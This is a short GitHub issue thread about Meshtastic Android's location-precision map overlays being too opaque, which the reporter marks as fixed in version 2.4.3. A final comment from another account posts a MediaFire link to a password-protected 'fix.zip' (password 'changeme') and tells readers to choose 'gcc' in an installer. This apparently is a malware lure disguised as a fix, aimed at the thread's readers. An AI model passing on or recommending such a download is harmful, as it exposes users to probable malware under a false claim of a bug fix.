meshtastic/Meshtastic-Android #1209: [Bug]: Fuzzy Location Overlays are.. barely transparent

Talie5in, 2024-08-26:
### Contact Details

@talie5in

### What happened?

Location Precision Overlays (single layer) make it near impossible to see map behind... could this be lowered to like 10% so it's not so?

[image]

### App Version

2.4.2

### Phone

Galaxy S23+

### Device

Any

### Firmware

2.5.0TP2

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

Talie5in, 2024-08-26:
Deep, fixed in 2.4.3

closed 2024-08-26 by Talie5in

MoonShadowIllusion, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."